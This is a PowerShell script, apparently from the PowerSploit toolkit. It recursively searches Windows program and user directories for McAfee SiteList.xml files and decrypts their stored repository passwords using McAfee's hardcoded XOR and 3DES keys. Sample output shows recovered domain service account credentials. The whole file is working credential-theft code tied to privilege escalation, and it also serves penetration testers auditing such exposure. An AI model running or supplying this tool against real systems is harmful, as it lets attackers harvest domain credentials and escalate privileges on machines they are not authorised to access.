1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
|
function Get-SiteListPassword {
<#
.SYNOPSIS
Retrieves the plaintext passwords for found McAfee's SiteList.xml files.
Based on Jerome Nokin (@funoverip)'s Python solution (in links).
PowerSploit Function: Get-SiteListPassword
Original Author: Jerome Nokin (@funoverip)
PowerShell Port: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.PARAMETER SiteListFilePath
Optional path to a SiteList.xml file.
.EXAMPLE
PS C:\> Get-SiteListPassword
EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
UserName :
Path : Products/CommonUpdater
Name : McAfeeHttp
DecPassword : MyStrongPassword!
Enabled : 1
DomainName :
Server : update.nai.com:80
EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
UserName : McAfeeService
Path : Repository$
Name : Paris
DecPassword : MyStrongPassword!
Enabled : 1
DomainName : companydomain
Server : paris001
EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
UserName : McAfeeService
Path : Repository$
Name : Tokyo
DecPassword : MyStrongPassword!
Enabled : 1
DomainName : companydomain
Server : tokyo000
.LINK
https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/
https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
#>
[CmdletBinding()]
param(
[ValidateScript({Test-Path -Path $_ })]
[String]
$SiteListFilePath
)
function Get-DecryptedSitelistPassword {
# PowerShell adaptation of https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
# Original Author: Jerome Nokin (@funoverip / jerome.nokin@gmail.com)
# port by @harmj0y
[CmdletBinding()]
Param (
[Parameter(Mandatory = $True)]
[String]
$B64Pass
)
# make sure the appropriate assemblies are loaded
Add-Type -assembly System.Security
Add-Type -assembly System.Core
# declare the encoding/crypto providers we need
$Encoding = [System.Text.Encoding]::ASCII
$SHA1 = New-Object System.Security.Cryptography.SHA1CryptoServiceProvider
$3DES = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider
# static McAfee key XOR key LOL
$XORKey = 0x12,0x15,0x0F,0x10,0x11,0x1C,0x1A,0x06,0x0A,0x1F,0x1B,0x18,0x17,0x16,0x05,0x19
# xor the input b64 string with the static XOR key
$I = 0;
$UnXored = [System.Convert]::FromBase64String($B64Pass) | Foreach-Object { $_ -BXor $XORKey[$I++ % $XORKey.Length] }
# build the static McAfee 3DES key TROLOL
$3DESKey = $SHA1.ComputeHash($Encoding.GetBytes('<!@#$%^>')) + ,0x00*4
# set the options we need
$3DES.Mode = 'ECB'
$3DES.Padding = 'None'
$3DES.Key = $3DESKey
# decrypt the unXor'ed block
$Decrypted = $3DES.CreateDecryptor().TransformFinalBlock($UnXored, 0, $UnXored.Length)
# ignore the padding for the result
$Index = [Array]::IndexOf($Decrypted, [Byte]0)
if($Index -ne -1) {
$DecryptedPass = $Encoding.GetString($Decrypted[0..($Index-1)])
}
else {
$DecryptedPass = $Encoding.GetString($Decrypted)
}
New-Object -TypeName PSObject -Property @{'Encrypted'=$B64Pass;'Decrypted'=$DecryptedPass}
}
function Get-SitelistFields {
[CmdletBinding()]
Param (
[Parameter(Mandatory = $True)]
[String]
$Path
)
try {
[Xml]$SiteListXml = Get-Content -Path $Path
if($SiteListXml.InnerXml -Like "*password*") {
Write-Verbose "Potential password in found in $Path"
$SiteListXml.SiteLists.SiteList.ChildNodes | Foreach-Object {
try {
$PasswordRaw = $_.Password.'#Text'
if($_.Password.Encrypted -eq 1) {
# decrypt the base64 password if it's marked as encrypted
$DecPassword = if($PasswordRaw) { (Get-DecryptedSitelistPassword -B64Pass $PasswordRaw).Decrypted } else {''}
}
else {
$DecPassword = $PasswordRaw
}
$Server = if($_.ServerIP) { $_.ServerIP } else { $_.Server }
$Path = if($_.ShareName) { $_.ShareName } else { $_.RelativePath }
$ObjectProperties = @{
'Name' = $_.Name;
'Enabled' = $_.Enabled;
'Server' = $Server;
'Path' = $Path;
'DomainName' = $_.DomainName;
'UserName' = $_.UserName;
'EncPassword' = $PasswordRaw;
'DecPassword' = $DecPassword;
}
New-Object -TypeName PSObject -Property $ObjectProperties
}
catch {
Write-Debug "Error parsing node : $_"
}
}
}
}
catch {
Write-Error $_
}
}
if($SiteListFilePath) {
$XmlFiles = Get-ChildItem -Path $SiteListFilePath
}
else {
$XmlFiles = 'C:\Program Files\','C:\Program Files (x86)\','C:\Documents and Settings\','C:\Users\' | Foreach-Object {
Get-ChildItem -Path $_ -Recurse -Include 'SiteList.xml' -ErrorAction SilentlyContinue
}
}
$XmlFiles | Where-Object { $_ } | Foreach-Object {
Write-Verbose "Parsing SiteList.xml file '$($_.Fullname)'"
Get-SitelistFields -Path $_.Fullname
}
}
|